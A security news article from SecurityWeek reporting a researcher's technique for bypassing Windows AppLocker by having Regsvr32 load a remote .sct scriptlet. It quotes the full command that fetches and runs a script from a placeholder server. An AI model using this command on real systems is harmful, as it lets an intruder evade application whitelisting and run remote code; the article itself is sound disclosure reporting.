Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Vulnerabilities

Windows AppLocker Bypassed to Execute Remote Scripts

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

When AppLocker was introduced in Windows 7 and Windows Server 2008 R2, Microsoft provided administrators with the ability to set rules to allow or deny applications from running. These rules could be enforced for specific users or groups and could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

In order to successfully bypass Windows AppLocker, an attacker needs to already have a foothold on the target machine, and also has to abuse Regsvr32, a command-line utility designed for registering DLLs in the registry, security researcher Casey Smith explains.

The researcher was looking for a way to register a script to bypass AppLocker, and discovered that the best way to do so is to place the script block inside of the Registration tag and then to call Regsvr32 to have the code executed. Moreover, Smith discovered that the code in the registration element executes on register and unregister.

Abusing Regsvr32 to execute the script comes with a series of benefits, as the command-line tool is proxy aware, uses TLS, follows redirects, and can also be set to run silently and to not display any message boxes.

“So, all you need to do is host your .sct file at a location you control. From the target, simply execute regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. It’s not well documented that Regsvr32 can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element,” the researcher explains.

Smith also said that the bypass can be used to call a local file, and that executing the script from the registration element doesn’t actually register the COM object, meaning that nothing will appear in registry. The researcher created a set of proof-of-concept scripts that can be loaded via Regsvr32 to open a backdoor or a reverse shell over HTTP.

Present even in Windows 10, the latest operating system version from Microsoft, AppLocker is considered as one of the most important security features in the platform. In February, when revealing Enhanced Mitigation Experience Toolkit (EMET) 5.5, Microsoft said that, next to Device Guard, and CFG, AppLocker is one of the Windows 10 features that provides equivalent (or better) mitigations than EMET.

Advertisement. Scroll to continue reading.

This is not the first time the Regsvr32 component is found to provide intruders with the possibility to perform nefarious operations on target computers. In 2014, the Neverquest banking Trojanwas also abusing it to execute its DLL module.

Written By

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Learn how to utilize tools, controls, and design models needed to properly secure cloud environments.

Register

Event: ICS Cybersecurity Conference

The leading industrial cybersecurity conference for Operations, Control Systems and IT/OT Security professionals to connect on SCADA, DCS PLC and field controller cybersecurity.

Register

People on the Move

Check Point Software has appointed Nadav Zafrir as Chief Executive Officer

BlackFog has named Brenda Robb as President, John Sarantakes as CRO, and Mark Griffith as VP of Strategic Sales

Former NSA cybersecurity chief Rob Joyce has joined Sandfly Security's Advisory Board.

More People On The Move

Expert Insights